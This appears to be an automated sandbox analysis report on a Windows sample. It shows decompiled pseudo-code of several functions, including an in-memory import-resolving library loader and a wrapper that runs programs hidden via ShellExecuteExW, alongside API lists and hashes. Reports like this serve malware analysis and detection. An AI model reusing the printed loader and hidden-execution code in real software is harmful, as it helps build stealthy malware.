                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Heap$Process$AddressAllocFreeLibraryLoadMemoryMoveProc
                                                                                                        • String ID:
                                                                                                        • API String ID: 2239585089-0
                                                                                                        • Opcode ID: 83aaa6b9efdcff029ce667accdbea47dbc1d9023ffd3e1f4c083ac3c3b109736
                                                                                                        • Instruction ID: 95db81e27f51f4f234ce82197dea85ae28d1b9d11ca97e36316960cd62a80ed4
                                                                                                        • Opcode Fuzzy Hash: 83aaa6b9efdcff029ce667accdbea47dbc1d9023ffd3e1f4c083ac3c3b109736
                                                                                                        • Instruction Fuzzy Hash: E6416C71704706DBD7048F69E88479AB3ADFB44315F444529E81AC7380E739E814CBA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00555326, Relevance: 10.6, APIs: 7, Instructions: 124COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __mtinitlocknum.LIBCMT ref: 0055533D
                                                                                                          • Part of subcall function 00544539: __FF_MSGBANNER.LIBCMT ref: 00544555
                                                                                                        • __lock.LIBCMT ref: 00555351
                                                                                                        • __lock.LIBCMT ref: 0055539A
                                                                                                        • ___crtInitCritSecAndSpinCount.LIBCMT ref: 005553B5
                                                                                                        • EnterCriticalSection.KERNEL32(00000115,007D5F28,00000018,00555793,00000109,00000000,00000000), ref: 005553DB
                                                                                                        • LeaveCriticalSection.KERNEL32(00000115), ref: 005553E8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection__lock$CountCritEnterInitLeaveSpin___crt__mtinitlocknum
                                                                                                        • String ID:
                                                                                                        • API String ID: 2236623020-0
                                                                                                        • Opcode ID: 1f88cfc31667782c92cd0b33cb66453937eea2a04fbb0584d8393200c8641bd6
                                                                                                        • Instruction ID: 0acc2d46530a689c0f3af0a0911e42c1ecb00f31fcb1a829b0c863d890cfecbe
                                                                                                        • Opcode Fuzzy Hash: 1f88cfc31667782c92cd0b33cb66453937eea2a04fbb0584d8393200c8641bd6
                                                                                                        • Instruction Fuzzy Hash: CE415930904B02CBDF208FA8D86939DBFE07F41337F25862EE525961D1E7B49988CB10
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709817EE, Relevance: 10.6, APIs: 7, Instructions: 98memorylibraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E709817EE(intOrPtr __eax, void* __edi, intOrPtr* _a12, struct HINSTANCE__* _a16) {
				intOrPtr _t34;
				struct HINSTANCE__* _t35;
				signed int _t37;
				intOrPtr _t38;
				signed short _t39;
				CHAR* _t41;
				_Unknown_base(*)()* _t43;
				signed int _t45;
				signed int _t46;
				signed int _t47;
				signed int _t51;
				void* _t52;
				intOrPtr* _t57;
				signed short* _t59;
				intOrPtr _t65;
				intOrPtr* _t68;
				void* _t73;
				signed short* _t76;
				void* _t81;
				signed short _t103;

				_t73 = __edi;
				_t34 = __eax;
				while(1) {
					_t57 = _a12;
					_t35 = LoadLibraryA( *((intOrPtr*)(_t73 + 0x144)) + _t34);
					_a16 = _t35;
					if(_t35 == 0) {
						break;
					}
					_t37 =  *(_t73 + 0x154);
					if( *(_t73 + 0x150) < _t37) {
						L13:
						if(_t81 != 0) {
							_t45 =  *(_t73 + 0x150);
							_t46 = _t45 + 1;
							 *(_t73 + 0x150) = _t46;
							if( *((intOrPtr*)(_t81 + _t45 * 4)) != 0) {
								 *((intOrPtr*)(_t81 + _t46 * 4)) = _a16;
								 *(_t73 + 0x150) =  *(_t73 + 0x150) + 1;
							}
						}
						_t38 =  *((intOrPtr*)(_t73 + 0x144));
						_t68 = _a12;
						_t76 =  *((intOrPtr*)(_t57 + 0x10)) + _t38;
						_t59 = _t76;
						if( *((intOrPtr*)(_t68 + 4)) == 0) {
							L19:
							_t39 =  *_t59;
							_t103 = _t39;
							if(_t103 == 0) {
								L26:
								_t34 =  *((intOrPtr*)(_t68 + 0x20));
								_a12 = _t68 + 0x14;
								if(_t34 != 0) {
									continue;
								} else {
									return 0;
								}
							} else {
								L20:
								L20:
								if(_t103 >= 0) {
									_t41 = _t39 +  *((intOrPtr*)(_t73 + 0x144)) + 2;
								} else {
									_t41 = _t39 & 0x0000ffff;
								}
								_t43 = GetProcAddress(_a16, _t41);
								 *_t76 = _t43;
								if(_t43 == 0) {
									break;
								}
								_t39 = _t59[2];
								_t59 =  &(_t59[2]);
								_t76 =  &(_t76[2]);
								if(_t39 != 0) {
									goto L20;
								} else {
									_t68 = _a12;
									goto L26;
								}
							}
						} else {
							_t65 =  *_t68;
							if(_t65 == 0) {
								return 8;
							} else {
								_t59 = _t65 + _t38;
								goto L19;
							}
						}
					} else {
						if(_t37 == 0) {
							_t47 = 0x10;
						} else {
							_t47 = _t37 + _t37;
						}
						 *(_t73 + 0x154) = _t47;
						_t81 = HeapAlloc(GetProcessHeap(), 8, _t47 * 4);
						if(_t81 == 0) {
							return 3;
						} else {
							_t51 =  *(_t73 + 0x150);
							if(_t51 != 0) {
								RtlMoveMemory(_t81,  *(_t73 + 0x14c), _t51 + _t51 + _t51 + _t51);
							}
							_t52 =  *(_t73 + 0x14c);
							if(_t52 != 0) {
								HeapFree(GetProcessHeap(), 0, _t52);
							}
							 *(_t73 + 0x14c) = _t81;
							goto L13;
						}
					}
					L31:
				}
				return 6;
				goto L31;
			}























                                                                                                        0x709817ee
                                                                                                        0x709817ee
                                                                                                        0x709817f0
                                                                                                        0x709817f0
                                                                                                        0x709817fd
                                                                                                        0x70981803
                                                                                                        0x70981809
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7098180f
                                                                                                        0x7098181b
                                                                                                        0x7098188b
                                                                                                        0x7098188d
                                                                                                        0x7098188f
                                                                                                        0x70981899
                                                                                                        0x7098189a
                                                                                                        0x709818a2
                                                                                                        0x709818a8
                                                                                                        0x709818ac
                                                                                                        0x709818ac
                                                                                                        0x709818a2
                                                                                                        0x709818b5
                                                                                                        0x709818bb
                                                                                                        0x709818bf
                                                                                                        0x709818c5
                                                                                                        0x709818c7
                                                                                                        0x709818d2
                                                                                                        0x709818d2
                                                                                                        0x709818d4
                                                                                                        0x709818d6
                                                                                                        0x7098190c
                                                                                                        0x7098190c
                                                                                                        0x70981912
                                                                                                        0x70981918
                                                                                                        0x00000000
                                                                                                        0x7098191e
                                                                                                        0x70981926
                                                                                                        0x70981926
                                                                                                        0x709818d8
                                                                                                        0x00000000
                                                                                                        0x709818d8
                                                                                                        0x709818d8
                                                                                                        0x709818e5
                                                                                                        0x709818da
                                                                                                        0x709818da
                                                                                                        0x709818da
                                                                                                        0x709818ef
                                                                                                        0x709818f5
                                                                                                        0x709818f9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709818fb
                                                                                                        0x709818fe
                                                                                                        0x70981901
                                                                                                        0x70981906
                                                                                                        0x00000000
                                                                                                        0x70981908
                                                                                                        0x70981908
                                                                                                        0x00000000
                                                                                                        0x70981908
                                                                                                        0x70981906
                                                                                                        0x709818c9
                                                                                                        0x709818c9
                                                                                                        0x709818cd
                                                                                                        0x7098193e
                                                                                                        0x709818cf
                                                                                                        0x709818cf
                                                                                                        0x00000000
                                                                                                        0x709818cf
                                                                                                        0x709818cd
                                                                                                        0x7098181d
                                                                                                        0x7098181f
                                                                                                        0x70981825
                                                                                                        0x70981821
                                                                                                        0x70981821
                                                                                                        0x70981821
                                                                                                        0x7098183a
                                                                                                        0x70981849
                                                                                                        0x7098184d
                                                                                                        0x70981932
                                                                                                        0x70981853
                                                                                                        0x70981853
                                                                                                        0x7098185b
                                                                                                        0x7098186a
                                                                                                        0x7098186a
                                                                                                        0x7098186f
                                                                                                        0x70981877
                                                                                                        0x7098187f
                                                                                                        0x7098187f
                                                                                                        0x70981885
                                                                                                        0x00000000
                                                                                                        0x70981885
                                                                                                        0x7098184d
                                                                                                        0x00000000
                                                                                                        0x7098181b
                                                                                                        0x7098194a
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 709817FD
                                                                                                        • GetProcessHeap.KERNEL32(00000008), ref: 70981840
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 70981843
                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 7098186A
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 7098187C
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 7098187F
                                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 709818EF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Heap$Process$AddressAllocFreeLibraryLoadMemoryMoveProc
                                                                                                        • String ID:
                                                                                                        • API String ID: 2239585089-0
                                                                                                        • Opcode ID: d11581166198095076423030efe4f29530a226d2f8aa8c5893cb8fd056899c9c
                                                                                                        • Instruction ID: 09845eb83bcdb93a99aa87419af566fb89927a3a6eab71b4650e465a154ed3e0
                                                                                                        • Opcode Fuzzy Hash: d11581166198095076423030efe4f29530a226d2f8aa8c5893cb8fd056899c9c
                                                                                                        • Instruction Fuzzy Hash: A53139B5604706EFD7058F69D8457AAB7BDBB84305F00852DE85ACB381E735E8108B92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004F851D, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 78COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch_GS.LIBCMT ref: 004F8524
                                                                                                          • Part of subcall function 004B69A2: __EH_prolog3.LIBCMT ref: 004B69A9
                                                                                                          • Part of subcall function 004ADA55: __EH_prolog3.LIBCMT ref: 004ADA60
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$H_prolog3_catch_
                                                                                                        • String ID: Yu$ Yu$Validation of saved private key failed!$XYu$XYu
                                                                                                        • API String ID: 2899319929-463955292
                                                                                                        • Opcode ID: b72047e8443ff2528a37d0fdf76c215a84cd6225be1a965180a23a41ccc110f3
                                                                                                        • Instruction ID: 23615aed599726b50c28bfde34f034c51c69683924d87b2994db35aaa23e3029
                                                                                                        • Opcode Fuzzy Hash: b72047e8443ff2528a37d0fdf76c215a84cd6225be1a965180a23a41ccc110f3
                                                                                                        • Instruction Fuzzy Hash: F321B774504148AADF14FF958956EAE7B75FF86314F01409DF252EB282CE381A09DB26
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709844E0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 63synchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 92%
                                                                                                        			E709844E0(intOrPtr _a4, intOrPtr _a8, DWORD* _a12) {
				intOrPtr _v0;
				intOrPtr _v4;
				struct _SHELLEXECUTEINFOW _v68;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				int _t25;
				DWORD* _t27;
				int _t35;
				signed int _t38;
				long _t40;

				_push(0x3c);
				_push( &(_v68.hwnd));
				L7098BF02();
				_t22 = _v0;
				_v68.cbSize = 0x3c;
				_v68.fMask = 0x800400;
				_v68.nShow = 0;
				if(_t22 != 0) {
					_v68.lpFile = _t22;
				}
				_t23 = _a4;
				if(_t23 != 0) {
					_v68.lpParameters = _t23;
				}
				_t24 = _v4;
				if(_t24 != 0) {
					_v68.lpVerb = _t24;
				}
				if(_a8 == 0) {
					_v68.fMask = 0x808400;
				} else {
					_v68.nShow = 1;
				}
				_t38 = _a12;
				if(_t38 != 0) {
					_v68.fMask = _v68.fMask | 0x00000040;
				}
				_t25 = ShellExecuteExW( &_v68);
				_t35 = _t25;
				if(_t35 != 0 && _t38 != 0) {
					if(_t38 == 0xffffffff) {
						_t40 = _t38 | 0xffffffff;
					} else {
						_t40 = _t38 * 0x3e8;
					}
					WaitForSingleObject(_v68.hIcon, _t40);
					_t27 = _a12;
					if(_t27 != 0) {
						GetExitCodeProcess(_v68.hIcon, _t27);
					}
					CloseHandle(_v68.hIcon);
					_t25 = _t35;
				}
				return _t25;
			}














                                                                                                        0x709844e3
                                                                                                        0x709844e9
                                                                                                        0x709844ea
                                                                                                        0x709844ef
                                                                                                        0x709844f3
                                                                                                        0x709844fa
                                                                                                        0x70984502
                                                                                                        0x7098450c
                                                                                                        0x7098450e
                                                                                                        0x7098450e
                                                                                                        0x70984512
                                                                                                        0x70984518
                                                                                                        0x7098451a
                                                                                                        0x7098451a
                                                                                                        0x7098451e
                                                                                                        0x70984524
                                                                                                        0x70984526
                                                                                                        0x70984526
                                                                                                        0x7098452f
                                                                                                        0x7098453b
                                                                                                        0x70984531
                                                                                                        0x70984531
                                                                                                        0x70984531
                                                                                                        0x70984544
                                                                                                        0x7098454b
                                                                                                        0x7098454d
                                                                                                        0x7098454d
                                                                                                        0x70984557
                                                                                                        0x7098455d
                                                                                                        0x70984561
                                                                                                        0x7098456a
                                                                                                        0x70984574
                                                                                                        0x7098456c
                                                                                                        0x7098456c
                                                                                                        0x7098456c
                                                                                                        0x7098457d
                                                                                                        0x70984583
                                                                                                        0x70984589
                                                                                                        0x70984591
                                                                                                        0x70984591
                                                                                                        0x7098459c
                                                                                                        0x709845a2
                                                                                                        0x709845a2
                                                                                                        0x709845a9

                                                                                                        APIs
                                                                                                        • RtlZeroMemory.NTDLL(0000003C,0000003C), ref: 709844EA
                                                                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 70984557
                                                                                                        • WaitForSingleObject.KERNEL32(?,?), ref: 7098457D
                                                                                                        • GetExitCodeProcess.KERNEL32 ref: 70984591
                                                                                                        • CloseHandle.KERNEL32(?), ref: 7098459C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CloseCodeExecuteExitHandleMemoryObjectProcessShellSingleWaitZero
                                                                                                        • String ID: @
                                                                                                        • API String ID: 1639083440-2766056989
                                                                                                        • Opcode ID: b73dea844fd5b5db9d1c71794693fb2b6673d01ecb686d070129b54b73d9ce2b
                                                                                                        • Instruction ID: 4f311a31759ec97e8795c623465bf21dc738923525502b805f8690948192a266
                                                                                                        • Opcode Fuzzy Hash: b73dea844fd5b5db9d1c71794693fb2b6673d01ecb686d070129b54b73d9ce2b
                                                                                                        • Instruction Fuzzy Hash: 672103B25083109FD3008B69C944B1EBBF8AF85B10F008A2DBA96973D0D7B4D9058B93
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00542EDB, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32(00000000,00542F8B,?,0054292D), ref: 00542EE8
                                                                                                        • TlsGetValue.KERNEL32(00000005,?,0054292D), ref: 00542EFF
                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,0054292D), ref: 00542F14
                                                                                                        • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00542F2F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Value$AddressHandleModuleProc
                                                                                                        • String ID: DecodePointer$KERNEL32.DLL
                                                                                                        • API String ID: 1929421221-629428536
                                                                                                        • Opcode ID: daeade647b8feb287508015551c8fa0aeb32813facc4e2a2f51a58b1d0ef2c89
                                                                                                        • Instruction ID: efe365297feeccc6c1a37202f58db626613db2d7e22c14de839c39ea6f584b8e
                                                                                                        • Opcode Fuzzy Hash: daeade647b8feb287508015551c8fa0aeb32813facc4e2a2f51a58b1d0ef2c89
                                                                                                        • Instruction Fuzzy Hash: E9F0F030104523AB87215B24EC069DA7EB8BF04364F948660F804D22B4DFB0EE469EA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70984D50, Relevance: 9.2, APIs: 6, Instructions: 192commemoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 38%
                                                                                                        			E70984D50() {
				char _v4;
				char _v12;
				char _v16;
				intOrPtr _v32;
				intOrPtr* _v36;
				char _v40;
				char _v44;
				intOrPtr* _v48;
				char _v52;
				intOrPtr* _v56;
				intOrPtr* _v60;
				intOrPtr _v64;
				intOrPtr* _v68;
				char _v72;
				intOrPtr* _v76;
				char _v80;
				intOrPtr* _v84;
				char _v88;
				intOrPtr* _v100;
				char _v104;
				intOrPtr* _v108;
				intOrPtr* _v124;
				intOrPtr _v128;
				intOrPtr* _v132;
				intOrPtr* _v136;
				intOrPtr _v140;
				intOrPtr* _v148;
				intOrPtr* _t67;
				intOrPtr* _t70;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t84;
				intOrPtr* _t87;
				intOrPtr* _t89;
				intOrPtr* _t94;
				intOrPtr* _t97;
				intOrPtr* _t99;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t106;
				intOrPtr* _t108;
				intOrPtr* _t111;
				void* _t150;
				void* _t151;
				void* _t153;
				intOrPtr* _t154;
				void* _t156;
				intOrPtr _t157;
				intOrPtr* _t158;

				_t158 = __imp__CoCreateInstance;
				_push( &_v16);
				_push(0x7098d44c);
				_push(1);
				_push(0);
				_push(0x7098d48c);
				_v12 = 0;
				_v4 = 0;
				_v16 = 0;
				if( *_t158() < 0) {
					L26:
					return _v32;
				}
				_t67 = _v36;
				_v40 = 0;
				_push( &_v40);
				_push(_t67);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t67 + 0x1c))))() < 0) {
					L25:
					_t70 = _v44;
					 *((intOrPtr*)( *((intOrPtr*)( *_t70 + 8))))(_t70);
					if(_v36 != 0) {
						return 1;
					}
					goto L26;
				}
				_t73 = _v48;
				_v52 = 0;
				_push( &_v52);
				_push(_t73);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t73 + 0x1c))))() < 0) {
					L24:
					_t76 = _v56;
					 *((intOrPtr*)( *((intOrPtr*)( *_t76 + 8))))(_t76);
					goto L25;
				} else {
					_t78 = _v60;
					_v44 = 0;
					_push( &_v44);
					_push(_t78);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t78 + 0x20))))() >= 0 && _v52 != 0) {
						_v48 = 1;
					}
					_t81 = _v68;
					_v72 = 0;
					_push( &_v72);
					_push(_t81);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t81 + 0x50))))() < 0) {
						L23:
						_t84 = _v76;
						 *((intOrPtr*)( *((intOrPtr*)( *_t84 + 8))))(_t84);
						goto L24;
					}
					_t154 = __imp__#2;
					_t151 =  *_t154(_v44, _t150, _t153);
					if(_t151 == 0) {
						L22:
						_t87 = _v84;
						 *((intOrPtr*)( *((intOrPtr*)( *_t87 + 8))))(_t87);
						goto L23;
					}
					_t89 = _v84;
					_push( &_v88);
					_v88 = 0;
					_push(_t151);
					_push(_t89);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t89 + 0x28))))() < 0) {
						if(_v64 != 0) {
							_t156 =  *_t154(_v56);
							if(_t156 != 0) {
								_push( &_v104);
								_push(0x7098d41c);
								_push(1);
								_push(0);
								_push(0x7098d46c);
								if( *_t158() >= 0) {
									_t94 = _v124;
									 *((intOrPtr*)( *((intOrPtr*)( *_t94 + 0x28))))(_t94, _t151);
									_t97 = _v132;
									 *((intOrPtr*)( *((intOrPtr*)( *_t97 + 0x20))))(_t97, _t156);
									_t99 = _v136;
									_push(_v140);
									_push(_t99);
									if( *((intOrPtr*)( *((intOrPtr*)( *_t99 + 0x20))))() >= 0) {
										_v128 = 1;
									}
									_t102 = _v148;
									 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 8))))(_t102);
								}
								__imp__#6(_t156);
							}
						}
						L21:
						__imp__#6(_t151);
						goto L22;
					}
					_t157 = _v52;
					if(_t157 == 0) {
						_t108 = _v100;
						_v80 = 0;
						 *((intOrPtr*)( *((intOrPtr*)( *_t108 + 0x44))))(_t108,  &_v80);
						if(_v88 == 0) {
							_t111 = _v108;
							 *((intOrPtr*)( *((intOrPtr*)( *_t111 + 0x48))))(_t111, 0xffffffff);
						}
					}
					_t104 = _v100;
					_v80 = 1;
					 *((intOrPtr*)( *((intOrPtr*)( *_t104 + 8))))(_t104);
					if(_t157 != 0) {
						_t106 = _v100;
						 *((intOrPtr*)( *((intOrPtr*)( *_t106 + 0x24))))(_t106, _t151);
					}
					goto L21;
				}
			}






















































                                                                                                        0x70984d55
                                                                                                        0x70984d5f
                                                                                                        0x70984d60
                                                                                                        0x70984d67
                                                                                                        0x70984d69
                                                                                                        0x70984d6a
                                                                                                        0x70984d6f
                                                                                                        0x70984d73
                                                                                                        0x70984d77
                                                                                                        0x70984d7f
                                                                                                        0x70984f4d
                                                                                                        0x00000000
                                                                                                        0x70984f4d
                                                                                                        0x70984d85
                                                                                                        0x70984d8d
                                                                                                        0x70984d93
                                                                                                        0x70984d94
                                                                                                        0x70984d9c
                                                                                                        0x70984f36
                                                                                                        0x70984f36
                                                                                                        0x70984f40
                                                                                                        0x70984f4b
                                                                                                        0x70984f56
                                                                                                        0x70984f56
                                                                                                        0x00000000
                                                                                                        0x70984f4b
                                                                                                        0x70984da2
                                                                                                        0x70984daa
                                                                                                        0x70984db0
                                                                                                        0x70984db1
                                                                                                        0x70984db9
                                                                                                        0x70984f2a
                                                                                                        0x70984f2a
                                                                                                        0x70984f34
                                                                                                        0x00000000
                                                                                                        0x70984dbf
                                                                                                        0x70984dbf
                                                                                                        0x70984dc7
                                                                                                        0x70984dcd
                                                                                                        0x70984dce
                                                                                                        0x70984dd6
                                                                                                        0x70984ddf
                                                                                                        0x70984ddf
                                                                                                        0x70984de7
                                                                                                        0x70984def
                                                                                                        0x70984df5
                                                                                                        0x70984df6
                                                                                                        0x70984dfe
                                                                                                        0x70984f1e
                                                                                                        0x70984f1e
                                                                                                        0x70984f28
                                                                                                        0x00000000
                                                                                                        0x70984f28
                                                                                                        0x70984e09
                                                                                                        0x70984e13
                                                                                                        0x70984e17
                                                                                                        0x70984f10
                                                                                                        0x70984f10
                                                                                                        0x70984f1a
                                                                                                        0x00000000
                                                                                                        0x70984f1d
                                                                                                        0x70984e1d
                                                                                                        0x70984e25
                                                                                                        0x70984e26
                                                                                                        0x70984e2f
                                                                                                        0x70984e30
                                                                                                        0x70984e35
                                                                                                        0x70984e98
                                                                                                        0x70984ea1
                                                                                                        0x70984ea5
                                                                                                        0x70984eab
                                                                                                        0x70984eac
                                                                                                        0x70984eb1
                                                                                                        0x70984eb3
                                                                                                        0x70984eb4
                                                                                                        0x70984ebd
                                                                                                        0x70984ebf
                                                                                                        0x70984eca
                                                                                                        0x70984ecc
                                                                                                        0x70984ed7
                                                                                                        0x70984ed9
                                                                                                        0x70984ee3
                                                                                                        0x70984ee4
                                                                                                        0x70984eec
                                                                                                        0x70984eee
                                                                                                        0x70984eee
                                                                                                        0x70984ef6
                                                                                                        0x70984f00
                                                                                                        0x70984f00
                                                                                                        0x70984f03
                                                                                                        0x70984f03
                                                                                                        0x70984ea5
                                                                                                        0x70984f09
                                                                                                        0x70984f0a
                                                                                                        0x00000000
                                                                                                        0x70984f0a
                                                                                                        0x70984e37
                                                                                                        0x70984e3d
                                                                                                        0x70984e3f
                                                                                                        0x70984e47
                                                                                                        0x70984e52
                                                                                                        0x70984e59
                                                                                                        0x70984e5b
                                                                                                        0x70984e67
                                                                                                        0x70984e67
                                                                                                        0x70984e59
